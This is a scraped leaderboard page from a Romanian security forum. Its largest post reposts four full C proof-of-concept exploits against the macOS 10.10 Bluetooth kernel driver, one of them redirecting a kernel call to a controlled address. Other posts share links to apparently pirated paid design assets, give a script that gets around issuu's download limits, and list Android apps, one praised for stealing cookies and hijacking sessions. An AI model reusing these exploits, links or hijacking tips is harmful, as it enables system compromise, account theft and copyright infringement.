Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 01/13/15 in all areas

  1. salut, am fost nevoit sa fac acest script (pentru iubita) si m-am gandit sa-l impart si cu voi. issuu.com este un site unde se pot vizualiza tot felul de reviste din diverse domenii (unele full altele nu) si din pacate nu toti publisheri permit descarcare lor. ID_REVISTA="$(curl $1 | grep image_src | awk -F'/' '{print $4}')" i="1" mkdir $ID_REVISTA cd $ID_REVISTA/ while (( $i <= $2 )) do wget http://image.issuu.com/$ID_REVISTA/jpg/page_$i.jpg i=$(( i+1 )) done se executa ./script.sh link_revista nr_pagini_de_descarcat ex: ./script.sh ISSUU - DeskMonsters - October 2014 by DESKMONSTERS 22 puteti sa-l modificati cum vreti voi daca aveti nevoie. nu am stiut sa-l scriu altfel sau in alt limbaj. dupa executie creeaza un folder local cu ID-revista care este unic si in el varsa toate paginile selectate in format .JPG have fun! LE: multumesc adminului care a mutat postul. nu stiam exact unde sa-l pun
    2 points
  2. M-am plictisit si am zis sa mai fac copiii bucurosi,distractie placuta. Infos : Christmas Photoshop Styles - Text Effects | GraphicRiver Zippyshare.com Info: Winter Style Text Effects - Bundle | GraphicRiver Zippyshare.com Info: Splatter Displacement Action | GraphicRiver Zippyshare.com Info: 40 Dark Background Patterns 2 | GraphicRiver Zippyshare.com Info: Rebecca Lily | Lightroom Presets and ACR Presets » Rebecca Lily Pro Presets – Set III Zippyshare.com - R.L.Pro Presets - Set III.rar Info: https://creativemarket.com/Linspace/109408-(75-OFF)-600-PS-Actions-Bundle Zippyshare.com Info: Christmas Sweet Styles | GraphicRiver Zippyshare.com Info: Abstract Photoshop Action Bundle | GraphicRiver Zippyshare.com Info: Points Pixelate Generator Action Set | GraphicRiver Zippyshare.com Info: Paper Art Action | GraphicRiver Zippyshare.com Info: 3D Metal Style Text Effect | GraphicRiver Zippyshare.com Info: Prism Photoshop Action | GraphicRiver Zippyshare.com Info: Pure Art Chalk Drawing | GraphicRiver RawChapu.7z Info: Vintage Throwback Actions | GraphicRiver Zippyshare.com
    1 point
  3. DOWNLOAD Password hint:Romanian Security Team P.S.:Te rog nu iti baga nasul daca nu ai lucrat in viata ta de hacker cu MASM sau nu stii ce face MOV.
    1 point
  4. OkayFreedom vpn https://www.okayfreedom.com/specials/windowsdeal/of
    1 point
  5. OS X 10.10 Bluetooth DispatchHCIWriteStoredLinkKey - Crash PoC /* * lpe-issue1.c * Written for Mac OS X Yosemite (10.10.1) by @ joystick and @ rpaleari. * * Exploits IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey() * * gcc -Wall -o lpe-issue1{,.c} -framework IOKit * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <mach/mach.h> #include <mach/vm_map.h> #include <IOKit/IOKitLib.h> #define SIZE 0x1000 struct BluetoothCall { uint64_t args[7]; uint64_t sizes[7]; uint64_t index; }; #ifndef bswap64 # define bswap64(num) \ ( (((uint64_t)(num) << 56) ) \ | (((uint64_t)(num) << 40) & UINT64_C(0x00FF000000000000)) \ | (((uint64_t)(num) << 24) & UINT64_C(0x0000FF0000000000)) \ | (((uint64_t)(num) << 8) & UINT64_C(0x000000FF00000000)) \ | (((uint64_t)(num) >> 8) & UINT64_C(0x00000000FF000000)) \ | (((uint64_t)(num) >> 24) & UINT64_C(0x0000000000FF0000)) \ | (((uint64_t)(num) >> 40) & UINT64_C(0x000000000000FF00)) \ | (((uint64_t)(num) >> 56) ) ) #endif void create_requests(io_connect_t port) { struct BluetoothCall a; uint32_t i; kern_return_t kr; for (i = 0; i < 7; i++) { a.args[i] = (uint64_t) calloc(SIZE, sizeof(char)); a.sizes[i] = SIZE; } /* DispatchHCIRequestCreate() */ a.index = 0x0; *(uint64_t *)a.args[0] = 5*1000; /* Timeout */ memset((void *)a.args[1], 0x81, 0x1000); memset((void *)a.args[2], 0x82, 0x1000); memset((void *)a.args[3], 0x83, 0x1000); memset((void *)a.args[4], 0x84, 0x1000); memset((void *)a.args[5], 0x85, 0x1000); memset((void *)a.args[6], 0x86, 0x1000); for(i = 0; i < 500; i++) { kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) &a, /* inputStruct */ 120, /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ if(kr == 0xe00002bd) /* Full */ break; } } int main(void) { struct BluetoothCall a; int i; void *landing_page = calloc(SIZE, sizeof(char)); /* Init a */ for (i = 0; i < 7; i++) { a.args[i] = (uint64_t) calloc(SIZE, sizeof(char)); a.sizes[i] = SIZE; } /* Finding vuln service */ io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController")); if (!service) { return -1; } /* Connect to vuln service */ io_connect_t port = (io_connect_t) 0; kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); IOObjectRelease(service); if (kr != kIOReturnSuccess) { return kr; } /* Populating with fake requests. */ create_requests(port); /* IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey() */ a.index = 42; /* Req number */ *((uint32_t *)a.args[0]) = 1; /* num_of_keys */ *((uint32_t *)a.args[1]) = 0x20; /* Padding */ memset((void *)a.args[3], 0x33, 152); /* mov rdi, [r14+0AB8h] */ *((uint64_t *)(a.args[3]+152)) = bswap64((uint64_t)landing_page); /* mov rax, [rdi] */ *((uint64_t *)((uint64_t)landing_page)) = (uint64_t)landing_page; /* call [rax+0x1d0]: this will trigger a #GP calling 0x4141414142424242 */ *((uint64_t *)((uint64_t)landing_page+0x1d0)) = (uint64_t) 0x4141414142424242; /* Here some fixing to the vtable is required to return cleanly after the exploit */ #if 0 /* Debug print */ for(i = 0; i < 120; i++) { if(i % 8 == 0) printf("\n"); printf("\\x%02x", ((unsigned char *)&a)[i]); } printf("\n"); #endif kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) &a, /* inputStruct */ 120, /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ printf("kr: %08x\n", kr); return IOServiceClose(port); } Source OS X 10.10 Bluetooth DispatchHCICreateConnection - Crash PoC /* * crash-issue1.c: Written for Mac OS X Yosemite (10.10) by @ rpaleari and @ joystick. * * Exploits a missing check in * IOBluetoothHCIUserClient::DispatchHCICreateConnection() causing a panic. * * gcc -Wall -o crash-issue1{,.c} -framework IOKit */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <mach/mach.h> #include <mach/vm_map.h> #include <IOKit/IOKitLib.h> #define SIZE 0x1000 struct BluetoothCall { uint64_t args[7]; uint64_t sizes[7]; uint64_t index; }; int main(void) { /* Finding vuln service */ io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController")); if (!service) { return -1; } /* Connect to vuln service */ io_connect_t port = (io_connect_t) 0; kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); IOObjectRelease(service); if (kr != kIOReturnSuccess) { return kr; } printf(" [+] Opened connection to service on port: %d\n", port); struct BluetoothCall a; int i; for (i=0; i<7; i++) { a.args[i] = (uint64_t) calloc(SIZE, sizeof(char)); a.sizes[i] = SIZE; } /* This value causes IOMalloc() to fail */ a.args[6] = 0x0; a.sizes[6] = 0x80000041; a.index = 0x06; /* DispatchHCICreateConnection() */ for(i = 0; i < 120; i++) { if(i % 8 == 0) printf("\n"); printf("\\x%02x", ((unsigned char *)&a)[i]); } printf("\n"); kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) &a, /* inputStruct */ 120, /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ printf("kr: %08x\n", kr); return IOServiceClose(port); } Source OS X 10.10 Bluetooth TransferACLPacketToHW - Crash PoC /* * crash-issue3.c: Written for Mac OS X Yosemite (10.10) by @ rpaleari and @ joystick. * * Exploits a missing check in * IOBluetoothHCIController::TransferACLPacketToHW() to trigger a panic. * * gcc -Wall -o crash-issue3{,.c} -framework IOKit * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <mach/mach.h> #include <mach/vm_map.h> #include <IOKit/IOKitLib.h> struct BluetoothCall { uint64_t args[7]; uint64_t sizes[7]; uint64_t index; }; int main(void) { /* Finding vuln service */ io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController")); if (!service) { return -1; } /* Connect to vuln service */ io_connect_t port = (io_connect_t) 0; kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); IOObjectRelease(service); if (kr != kIOReturnSuccess) { return kr; } printf(" [+] Opened connection to service on port: %d\n", port); struct BluetoothCall a; memset(&a, 0, sizeof(a)); a.sizes[0] = 0x1000; a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char)); a.sizes[1] = 0x1000; a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char)); memset((void *)a.args[1], 0x22, 0x1000); /* Call DispatchHCISendRawACLData() */ a.index = 0x63; /* Debug */ for(int i = 0; i < 120; i++) { if(i % 8 == 0) printf("\n"); printf("\\x%02x", ((unsigned char *)&a)[i]); } printf("\n"); fflush(stdout); kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) &a, /* inputStruct */ sizeof(a), /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ printf("kr: %08x\n", kr); return IOServiceClose(port); } Source OS X 10.10 Bluetooth BluetoothHCIChangeLocalName - Crash PoC /* * crash-issue2.c: Written for Mac OS X Yosemite (10.10) by @ rpaleari and @ joystick. * * Triggers a panic overwriting a stack_canary. * * gcc -Wall -o crash-issue2{,.c} -framework IOKit * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <mach/mach.h> #include <mach/vm_map.h> #include <IOKit/IOKitLib.h> struct BluetoothCall { uint64_t args[7]; uint64_t sizes[7]; uint64_t index; }; int main(void) { /* Finding vuln service */ io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController")); if (!service) { return -1; } /* Connect to vuln service */ io_connect_t port = (io_connect_t) 0; kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); IOObjectRelease(service); if (kr != kIOReturnSuccess) { return kr; } printf(" [+] Opened connection to service on port: %d\n", port); struct BluetoothCall a; a.sizes[0] = 0x1000; a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char)); /* This arguments overflows a local buffer and the adjacent stack canary */ a.sizes[1] = 264; a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char)); memset((void *)a.args[1], 'A', a.sizes[1]); /* Call IOBluetoothHCIUserClient::DispatchHCIReadLocalName() */ a.index = 0x2d; /* Debug */ for(int i = 0; i < 120; i++) { if(i % 8 == 0) printf("\n"); printf("\\x%02x", ((unsigned char *)&a)[i]); } printf("\n"); fflush(stdout); kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) &a, /* inputStruct */ sizeof(a), /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ printf("kr: %08x\n", kr); return IOServiceClose(port); } Source
    1 point
  6. Here we have in no particular order the top Android apps for hacking using an android smartphone. Disclaimer: These apps should be used for research purposes only 1. SpoofApp:- SpoofApp is a Caller ID Spoofing, Voice Changing and Call Recording mobile app for your iPhone, BlackBerry and Android phone. It’s a decent mobile app to help protect your privacy on the phone. However, it has been banned from the Play Store for allegedly being in conflict with The Truth in Caller ID Act of 2009. 2. Andosid:- The DOS tool for Android Phones allows security professionals to simulate a DOS attack (an http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones. 3.Faceniff:- Allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks. 4.Nmapper:- (Network Mapper) is a security scanner originally written by Gordon Lyon used to discover hosts and services on a computer network, thus creating a “map” of the network. To accomplish its goal, Nmapper sends specially crafted packets to the target host and then analyses the responses. 5. Anti-Android Network Toolkit:- zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety. 6. SSHDroid:- SSHDroid is a SSH server implementation for Android. This application will let you connect to your device from a PC and execute commands (like “terminal” and “adb shell”) or edit files (through SFTP, WinSCP, Cyberduck, etc). 7. WiFi Analyser:- Turns your android phone into a Wi-Fi analyser. Shows the Wi-Fi channels around you. Helps you to find a less crowded channel for your wireless router. 8. Network Discovery:- Discover hosts and scan their ports in your Wifi network. A great tool for testing your network security. 9. ConnectBot:- ConnectBot is a powerful open-source Secure Shell (SSH) client. It can manage simultaneous SSH sessions, create secure tunnels, and copy/paste between other applications. This client allows you to connect to Secure Shell servers that typically run on UNIX-based servers. 10. dSploit:-Android network analysis and penetration suite offering the most complete and advanced professional toolkit to perform network security assesments on a mobile device. 11. Hackode:- The hacker’s Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc. 12.Androrat:- Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server. 13.APKInspector:- APKinspector is a powerful GUI tool for analysts to analyse the Android applications. The goal of this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code. 14.DroidBox:- DroidBox is developed to offer dynamic analysis of Android applications. 15.Burp Suite:- Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. 16. Droid Sheep:- DroidSheep can be easily used by anybody who has an Android device and only the provider of the web service can protect the users. So Anybody can test the security of his account by himself and can decide whether to keep on using the web service. 17. AppUse:– Android Pentest Platform Unified Standalone Environment:- AppSec Labs recently developed the AppUse Virtual Machine. This system is a unique, free, platform for mobile application security testing in the android environment, and it includes unique custom-made tools created by AppSec Labs. 18. Shark for Root:- Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump. 19. Fing:- Find out which devices are connected to your Wi-Fi network, in just a few seconds. Fast and accurate, Fing is a professional App for network analysis. A simple and intuitive interface helps you evaluate security levels, detect intruders and resolve network issues. 20.Drozer:- drozer enables you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps’ IPC endpoints and the underlying OS. drozer provides tools to help you use and share public Android exploits. It helps you to deploy a drozer agent by using weasel – MWR’s advanced exploitation payload. 21. WifiKill:- Second app, developed also by B.Ponury is an app which can kill connections and kick site-hoggers from the site. This app definitely kick then net user from the site so he cannot use it anymore. The app also offers the list of viewed sites by the hogger. 22. DroidSniff:- Similar to DroidSheep but with a newer and nicer interface is DroidSniff – sniffing app not only for Facebook. This app shows you what is the hogger looking for and then you can “take” his control, steal the cookies and rock’n’roll. Works perfectly. 23. Network Spoofer:- The last app, called NetWork Spoofer is very similar to dSploit but it’s more easier to use. Only hitch is that you need to have at least 500MB of free data. It offers you a lot of troll features – change Google searches, flip images, redirect websites, swap YouTube videos and others. 24. Droid SQLI:- allows you to test your MySQL based web application against SQL injection attacks. DroidSQLi supports the following injection techniques: Time based injection, blind injection, error based injection, normal injection. 25. sqlmapchik:- is a cross-platform sqlmap GUI for the extremely popular sqlmap tool Sursa: The Top Android Apps for Hacking
    1 point
  7. SSHDroid Poate fi descarcat direct de pe Google Play, dar aveti nevoie de un telefon pe care sa aveti drepturi de root; Odata instalat, ar trebui sa treceti pe la optiuni si sa le configurati dupa bunul plac. http://s28.postimg.org/5o17umiot/Screenshot_2015_01_13_10_54_11.png Cand serviciul este pornit, va arata cam asa: http://s28.postimg.org/bxwhhmi3h/Screenshot_2015_01_13_10_52_49.png Va puteti conecta PC-ul la aceeasi retea, apoi sa va conectati la telefon prin ssh (folosind putty sau ce preferati voi): ~~~~~~~~~~~~ Daca aveti cumva nevoie de un server FTP pe telefonul mobil, o aplicatie similara este FTPDroid O multime de optiuni (configuratia din imagine nu este prea sigura - va las sa ghiciti de ce): http://s28.postimg.org/4j75p8w7x/Screenshot_2015_01_13_10_58_32.png Asa arata aplicatia cand serviciul este pornit: http://s28.postimg.org/5zio7dz4t/Screenshot_2015_01_13_10_58_04.png Si va puteti conecta la telefon prin ftp direct din browser, sau folosind clientul vostru ftp preferat: Aveti grija sa inchideti serviciile (butonul STOP din aplicatie, in dreapta-sus), nu doar sa le bagati in bara, altfel vor ramane pornite:
    1 point
×
×
  • Create New...